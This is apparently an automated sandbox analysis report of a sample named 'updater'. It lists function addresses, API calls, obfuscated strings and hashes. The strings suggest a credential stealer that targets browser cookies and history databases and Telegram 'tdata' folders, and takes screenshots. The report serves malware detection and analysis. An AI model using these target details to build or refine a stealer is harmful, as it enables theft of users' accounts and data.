Opcode Fuzzy Hash: 52971c383eb820f421be35625cf8980d64a2197894de7d46863f481200fd8dc3
Instruction Fuzzy Hash: 16D133B5A043829FDF25EFB8E84852D7FA5FB12A1CB19405EE0419F2B9DB748C41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013D7009 Relevance: 34.6, Strings: 26, Instructions: 2051COMMON

Download Yara Rule

Strings

., xrefs: 013D8BE7
$., xrefs: 013D7840
., xrefs: 013D8705
ru, xrefs: 013D86FF
(\;, xrefs: 013D880F
CLK\, xrefs: 013D7934
., xrefs: 013D8A53
Mozilla, xrefs: 013D70E6
sqMAAEGK], xrefs: 013D867C
MEKJ, xrefs: 013D7836
NULL,secure, xrefs: 013D71B3
is_secure, xrefs: 013D707F, 013D708A, 013D70B0
[@^O, xrefs: 013D782C
FALSE, xrefs: 013D81E9
., xrefs: 013D8B70
]KM[\K, xrefs: 013D8565
C, xrefs: 013D87D0
[-] data unpacked failed, xrefs: 013D8EBA
., xrefs: 013D7741
[+] data unpacked, xrefs: 013D88EE
., xrefs: 013D8536
] - [user: , xrefs: 013D7B8E, 013D8C57
., xrefs: 013D7503
., xrefs: 013D7941
secure, xrefs: 013D7337
cATGBBO., xrefs: 013D7E78

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalDeallocateSection$EnterLeave__fread_nolock
String ID: $.$(\;$.$.$.$.$.$.$.$.$C$CLK\$FALSE$MEKJ$Mozilla$NULL,secure$[+] data unpacked$[-] data unpacked failed$[@^O$] - [user: $]KM[\K$cATGBBO.$is_secure$ru$secure$sqMAAEGK]
API String ID: 1177441120-226374639
Opcode ID: 893b640a4ef04119c3c29ff32779354f579d89657b3eb28c13ae970948e639cf
Instruction ID: 8f45e7bc6b5c067fe38165f835d315d784e7b63dc8c2e3466e9b64b9e0c13936
Opcode Fuzzy Hash: 893b640a4ef04119c3c29ff32779354f579d89657b3eb28c13ae970948e639cf
Instruction Fuzzy Hash: 4713E331D04299DEDB15EBB8E844BDDBBB4BF25308F2041EED0456B2A1DB705A89CF52

Uniqueness

Uniqueness Score: -1.00%

Function 013D3E7B Relevance: 30.3, APIs: 2, Strings: 14, Instructions: 2285COMMON

Download Yara Rule

APIs

Part of subcall function 01422C70: QueryPerformanceCounter.KERNEL32(?), ref: 01422C8B

GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 013D3EE2
GetModuleFileNameA.KERNEL32(00000000), ref: 013D3EE9

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Strings

mac~{zk|`ock., xrefs: 013D4040
hGBK, xrefs: 013D4812
tMO], xrefs: 013D49AF
kmz{, xrefs: 013D3F8A
sec., xrefs: 013D5C90
(\;, xrefs: 013D6223
@traffer, xrefs: 013D54B5
., xrefs: 013D4FE1
}ZKO, xrefs: 013D43A4
., xrefs: 013D3F97
~, xrefs: 013D5C7C
|k, xrefs: 013D3F91
), xrefs: 013D55AA
mO\J, xrefs: 013D4E34

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveModule$ConditionCounterDeallocateFileHandleNamePerformanceQueryVariableWake
String ID: sec.$(\;$)$.$.$@traffer$hGBK$kmz{$mO\J$mac~{zk|`ock.$tMO]$|k$}ZKO$~
API String ID: 3852128730-870685121
Opcode ID: a0eacb1838da82b5f0432b927599f491542904100ca8e2c841c2ee4940c375f9
Instruction ID: 4f6addb6bf1fc3a32f8cf2334d6cc8a2f7c8bfcbdd6d45e7afb9e25faa641db5
Opcode Fuzzy Hash: a0eacb1838da82b5f0432b927599f491542904100ca8e2c841c2ee4940c375f9
Instruction Fuzzy Hash: D3230571D0429A8EDF15EBB8E844BDDBBB4AF61208F2440DED0496B1A1DB745F88CF52

Uniqueness

Uniqueness Score: -1.00%

Function 013CB653 Relevance: 27.2, Strings: 21, Instructions: 924
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 013CBEC9
., xrefs: 013CBAA9
., xrefs: 013CC32E
., xrefs: 013CC0E5
., xrefs: 013CBCB9
(\;, xrefs: 013CC406
., xrefs: 013CB979
~A\Z, xrefs: 013CBCA6
., xrefs: 013CBFAC
&, xrefs: 013CC3F8
., xrefs: 013CB8EF
., xrefs: 013CBD96
{]K\, xrefs: 013CBEB6
~O]], xrefs: 013CC0D2
CB, xrefs: 013CB72B
., xrefs: 013CB731
O@OI, xrefs: 013CB71D
fA]Z, xrefs: 013CBA96
LO]K, xrefs: 013CBF9E
., xrefs: 013CBB86
hGBKtGBBOr, xrefs: 013CC353

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: &$(\;$.$.$.$.$.$.$.$.$.$.$.$CB$LO]K$O@OI$fA]Z$hGBKtGBBOr${]K\$~A\Z$~O]]
API String ID: 1208101283-339470192
Opcode ID: c873604f8258ecc0854e41bde1d149fba5cadf55e275cb3d86994cc7c597202c
Instruction ID: 2940fb0337f2d691125cff2c933c6a5297448fced68c27b4820fd1cd32ba8a29
Opcode Fuzzy Hash: c873604f8258ecc0854e41bde1d149fba5cadf55e275cb3d86994cc7c597202c
Instruction Fuzzy Hash: B7822671D04289DFDB25EBB8D949BDDBBB4AF21318F20419ED0456B2A5DB701E88CF12

Uniqueness

Uniqueness Score: -1.00%

Function 013D1BD6 Relevance: 25.7, Strings: 20, Instructions: 717
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 013D1D67
dOLLK\r., xrefs: 013D2622
ZAMA, xrefs: 013D1DEF
`OCK, xrefs: 013D214D
., xrefs: 013D2595
~\AZ, xrefs: 013D1F3A
B., xrefs: 013D1C0E
., xrefs: 013D215A
AMAB, xrefs: 013D1F41
., xrefs: 013D1F4E
., xrefs: 013D2020
(\;, xrefs: 013D2696
AZAM, xrefs: 013D1E97
ZAMA, xrefs: 013D1D5A
]YA\, xrefs: 013D2225
~O]], xrefs: 013D2364
]]YA, xrefs: 013D22CA
., xrefs: 013D2232
., xrefs: 013D2371
., xrefs: 013D1DFC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: (\;$.$.$.$.$.$.$.$.$AMAB$AZAM$B.$ZAMA$ZAMA$]YA\$]]YA$`OCK$dOLLK\r.$~O]]$~\AZ
API String ID: 2013694253-1575873031
Opcode ID: 5c05c0f5ac3690b8a1747788527b64071056abf583f18ebf64d5de2a853b4d8a
Instruction ID: 103ae6b30eae783fcb19a3319999f3701efaa9b33c3f6b5c69ce65c38ed2c739
Opcode Fuzzy Hash: 5c05c0f5ac3690b8a1747788527b64071056abf583f18ebf64d5de2a853b4d8a
Instruction Fuzzy Hash: E4520672D04289DFDB25EFA8E848BDDBB75BF2131CF14419DD0496B2A1DB701A89CB12

Uniqueness

Uniqueness Score: -1.00%

Function 013D3095 Relevance: 22.1, Strings: 17, Instructions: 872
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hAVs, xrefs: 013D37B9
., xrefs: 013D396D
., xrefs: 013D3CAD
HGBK, xrefs: 013D330C
., xrefs: 013D37D4
\Main, xrefs: 013D3260
., xrefs: 013D372F
[]K\, xrefs: 013D37C7
!, xrefs: 013D3D39
]|, xrefs: 013D3840
., xrefs: 013D38A0
]A@., xrefs: 013D35FB
Z@OC, xrefs: 013D371B
]., xrefs: 013D3313
BAIG@], xrefs: 013D362D
Z@OC, xrefs: 013D388C
Install Directory, xrefs: 013D31B0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: !$.$.$.$.$.$BAIG@]$HGBK$Install Directory$Z@OC$Z@OC$[]K\$\Main$]|$].$]A@.$hAVs
API String ID: 1208101283-1360112660
Opcode ID: 82a12a0b5e116e89ab8b3d2118db5d8b534dd017388864de35e481d822f4c32e
Instruction ID: 7f2db351a03a4c287f6148cf35fe95c4de9e460274b38244a55af737a524638d
Opcode Fuzzy Hash: 82a12a0b5e116e89ab8b3d2118db5d8b534dd017388864de35e481d822f4c32e
Instruction Fuzzy Hash: 517237B2D002599BDF24EBB8E844BEDBB74BF21308F14419DD4496B2A1DF705E89CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013D04AD Relevance: 21.4, Strings: 16, Instructions: 1382COMMON

Download Yara Rule

Strings

=, xrefs: 013D1AFB
\history\, xrefs: 013D0EDA, 013D1A01
., xrefs: 013D0DA9
r~}g, xrefs: 013D08F8
\history, xrefs: 013D0AFA, 013D1622
(\;, xrefs: 013D0A5C, 013D0F26, 013D1591, 013D1A4D
r~}g, xrefs: 013D0D96
dOLLK\r., xrefs: 013D0E49
dOLLK\r., xrefs: 013D099E
r~}gr., xrefs: 013D1468
r~}gr., xrefs: 013D18FE
rOMMA[@Z], xrefs: 013D0746
., xrefs: 013D090B
B., xrefs: 013D1257
B., xrefs: 013D139C
rOMMA[@Z], xrefs: 013D0880

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
String ID: (\;$.$.$=$B.$B.$\history$\history\$dOLLK\r.$dOLLK\r.$rOMMA[@Z]$rOMMA[@Z]$r~}g$r~}g$r~}gr.$r~}gr.
API String ID: 4060657020-3929556054
Opcode ID: b738e67fffe2ae8eec5da1e00521dafb6a76833933325f82e21a3c30227a5f9c
Instruction ID: ec1f19454d30142f03447159c014872252038e69895502ca0dd7d8c97752d222
Opcode Fuzzy Hash: b738e67fffe2ae8eec5da1e00521dafb6a76833933325f82e21a3c30227a5f9c
Instruction Fuzzy Hash: 4FD28D71D0429ADEDF25EBA8E894BDDBB74AF25308F1040DDD4496B2A1DB701B88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013DA518 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 238
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(01465C78), ref: 013DA5B7
GetProcAddress.KERNEL32(00000000,0146606C), ref: 013DA645
GetProcAddress.KERNEL32(01465180), ref: 013DA754
GetProcAddress.KERNEL32(00000000), ref: 013DA76E
GetProcAddress.KERNEL32(00000000), ref: 013DA7D7
GetProcAddress.KERNEL32(01464F88), ref: 013DA6CA

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

GetProcAddress.KERNEL32(01466088), ref: 013DA861

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

FreeLibrary.KERNEL32 ref: 013DA8AA

Strings

XO[BZMBG, xrefs: 013DA57A
., xrefs: 013DA7F8
gZKC, xrefs: 013DA7F1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalSection$EnterLeaveLibrary$ConditionFreeLoadVariableWake
String ID: .$XO[BZMBG$gZKC
API String ID: 2402374661-770554371
Opcode ID: 0325afdf4ce1166ecbb6cd8a4ed9218b557965fc8624c3566de651b0fa24ed02
Instruction ID: d6d2b85fa4ed95bcbde282cc30491b4d7af80811547cb58806302bf8a3cff5aa
Opcode Fuzzy Hash: 0325afdf4ce1166ecbb6cd8a4ed9218b557965fc8624c3566de651b0fa24ed02
Instruction Fuzzy Hash: 229111B6900282DEDF25EFA9F54865D7FB0BB1132CF1A011ED560AB2B9CB745481CB53

Uniqueness

Uniqueness Score: -1.00%

Function 013DB7C3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 155
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

KiUserCallbackDispatcher.NTDLL ref: 013DB8AB
GetSystemMetrics.USER32 ref: 013DB8B4
GetDC.USER32(00000000), ref: 013DB8BB
SelectObject.GDI32(00000000,00000000), ref: 013DB8E5
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 013DB8FE

Part of subcall function 013C4619: InitializeCriticalSectionEx.KERNEL32(01464D88,00000000,00000000,?,013C471E,?,?,013C46CC), ref: 013C465C
Part of subcall function 013C4619: GetLastError.KERNEL32(?,013C471E,?,?,013C46CC), ref: 013C4666

EnterCriticalSection.KERNEL32(00000004), ref: 013DB937
LeaveCriticalSection.KERNEL32(00000004), ref: 013DB941

Part of subcall function 013C4BCB: GetObjectA.GDI32(?,00000054,?), ref: 013C4BDF

DeleteDC.GDI32(?), ref: 013DB96F
DeleteObject.GDI32(00000000), ref: 013DB976
ReleaseDC.USER32(00000000,?), ref: 013DB981

Part of subcall function 013C46E3: DeleteObject.GDI32(?), ref: 013C4711
Part of subcall function 013C46E3: EnterCriticalSection.KERNEL32(00000004,?,?,013C46CC), ref: 013C4724
Part of subcall function 013C46E3: LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013C46CC), ref: 013C4738

Strings

(\;, xrefs: 013DB9A0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$Object$Delete$EnterLeave$CallbackDeallocateDispatcherErrorInitializeLastMetricsReleaseSelectSystemUser
String ID: (\;
API String ID: 1025157159-1847211318
Opcode ID: 5db2a7f9ec3cecce280371ff283b3a54c782a4a8656f66268d67a81031695e21
Instruction ID: c863e2e36b0a6a9f34aff27ba88a21ffa4d2e8b0db7f0e677f7101ec0b144226
Opcode Fuzzy Hash: 5db2a7f9ec3cecce280371ff283b3a54c782a4a8656f66268d67a81031695e21
Instruction Fuzzy Hash: 0A51AD35D0125AEFEB14EBB4ED44BEEBBB8EF25314F10419AE509A31A0DB701E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014061B5 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(?,00000000,?), ref: 01406277
GetLastError.KERNEL32 ref: 01406281
___std_fs_open_handle@16.LIBCPMT ref: 014062E9
GetLastError.KERNEL32 ref: 01406353

Strings

kernel32.dll, xrefs: 01406308
GetFileInformationByHandleEx, xrefs: 01406303

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$LongNamePath___std_fs_open_handle@16
String ID: GetFileInformationByHandleEx$kernel32.dll
API String ID: 2391694696-1782754588
Opcode ID: 907b12f5617fb910a7d5b8adde2d9c17cfe3ca8fe3356472011b2aac70c7bf8e
Instruction ID: bf1dded0e1b31a759238c51609dc340e2ed196c6a6873adc82a105028bca7289
Opcode Fuzzy Hash: 907b12f5617fb910a7d5b8adde2d9c17cfe3ca8fe3356472011b2aac70c7bf8e
Instruction Fuzzy Hash: 80A180759002159FDB25CF29C844BAABBB4BF04320F1546BAED25EB3E1E770D951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013C7D35 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDesktopWindow.USER32 ref: 013C801F
GetTickCount.KERNEL32(?,?,014543AB), ref: 013C8027

Part of subcall function 013C7BE2: CloseHandle.KERNEL32(00000000), ref: 013C7BF7

Strings

UT, xrefs: 013C7F72

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CloseCountDesktopHandleTickWindow
String ID: UT
API String ID: 3281157955-894488996
Opcode ID: 01848ab54ea4a807591111b279231b41262d215aab2c4157442cdaf6ccc286fc
Instruction ID: 1f049c16317f200b26c3c5d98c245cafa3070c848317cc28c451db0329f0ef8e
Opcode Fuzzy Hash: 01848ab54ea4a807591111b279231b41262d215aab2c4157442cdaf6ccc286fc
Instruction Fuzzy Hash: C7F1AE71608742AFD715DF69C484BAAFBE4BF95708F04482EE98587351EB30E948CF92

Uniqueness

Uniqueness Score: -1.00%

Function 013D9151 Relevance: 13.7, Strings: 10, Instructions: 1230COMMON

Download Yara Rule

Strings

bAIG, xrefs: 013D948B
(size: , xrefs: 013D9832, 013D9D55, 013DA1CE
., xrefs: 013D94AF
.sqlite, xrefs: 013D93DC
ZO, xrefs: 013D949F
., xrefs: 013D9E57
M, xrefs: 013DA27B
mAAEGK]., xrefs: 013D9928
@, xrefs: 013D998E
jOZO, xrefs: 013D9E4D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
String ID: (size: $.$.$.sqlite$@$M$ZO$bAIG$jOZO$mAAEGK].
API String ID: 4060657020-1872904414
Opcode ID: 10485a07fe36493587162b445db790a476257d0cef31ea2cff91cf9db46c2370
Instruction ID: 76829cb676b33ee5af900949c01bb073c3550bef696bdf6df49482e2a58de651
Opcode Fuzzy Hash: 10485a07fe36493587162b445db790a476257d0cef31ea2cff91cf9db46c2370
Instruction Fuzzy Hash: 23B27A72D0425ADEDF15EBA8D890BEDBBB4AF24308F1041EDD4096B291EB705F49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013C9294 Relevance: 12.3, Strings: 9, Instructions: 1004COMMON

Download Yara Rule

Strings

}ZKO, xrefs: 013C9D8D
@r, xrefs: 013C9EC7
}ZKOC~OZF., xrefs: 013C92FB
(\;, xrefs: 013C98A9, 013C9E2B, 013CA16C
B, xrefs: 013CA0EB
., xrefs: 013C9ED4
]]H@, xrefs: 013C967D
rMA@HGI., xrefs: 013C9961
@HGI, xrefs: 013C9D9D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: (\;$.$@HGI$@r$B$]]H@$rMA@HGI.$}ZKO$}ZKOC~OZF.
API String ID: 2013694253-205258442
Opcode ID: b18adbcd16504d8a9b5a9836719bf645bf633dbfc99aeb200ae3a2fb02da463c
Instruction ID: 58dae0777cdd66a4c8336da6ab95a82a86fc369699a673bfb21d265cc1e93a6e
Opcode Fuzzy Hash: b18adbcd16504d8a9b5a9836719bf645bf633dbfc99aeb200ae3a2fb02da463c
Instruction Fuzzy Hash: AF92AB31D04299DEDF25EBA8D894BDDBBB5AF24308F1441DED4096B2A1DB701E89CF21

Uniqueness

Uniqueness Score: -1.00%

Function 013CC9EC Relevance: 11.9, Strings: 9, Instructions: 609COMMON

Download Yara Rule

Strings

., xrefs: 013CD1D1
., xrefs: 013CCA32
\tdata\, xrefs: 013CCB5A
map, xrefs: 013CD109
)\tdata\, xrefs: 013CD240
(\;, xrefs: 013CCEC5, 013CD28B
m., xrefs: 013CCF8C
zKBKI\OC, xrefs: 013CCA57
#, xrefs: 013CD277

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: #$(\;$)\tdata\$.$.$\tdata\$m.$map$zKBKI\OC
API String ID: 2013694253-29942256
Opcode ID: 6c0b80f7e0415309114fbd5d4d2c4251d8fc4bf14e403608b6473b0c136516b0
Instruction ID: 5705ad1d30952c6e4a979220b1b28f3532218e0e45e69bc8f37ce1e5d13f0c3a
Opcode Fuzzy Hash: 6c0b80f7e0415309114fbd5d4d2c4251d8fc4bf14e403608b6473b0c136516b0
Instruction Fuzzy Hash: 1042BD71D0025ADBDF24EBA8D894BDDBBB4AF25308F1041EED449A7291DB705E88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013DAF64 Relevance: 9.3, Strings: 7, Instructions: 527COMMON

Download Yara Rule

Strings

PlayerName, xrefs: 013DB423
{}k|jozo, xrefs: 013DB0CF
., xrefs: 013DAFAD
(\;, xrefs: 013DB31A, 013DB6DD
.txt, xrefs: 013DB416, 013DB4FC
r., xrefs: 013DB632
{]K\]r, xrefs: 013DAFDC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: (\;$.$.txt$PlayerName$r.${]K\]r${}k|jozo
API String ID: 2013694253-334844750
Opcode ID: 864134fe9463fd46e622812077fbba67faf6fe5618b4d39093ee305d6e7f5d8e
Instruction ID: 72a174876b84e750a0c7ba04c2e32f2dc8a3836a1aa42a47a6e5a14124c8b8dd
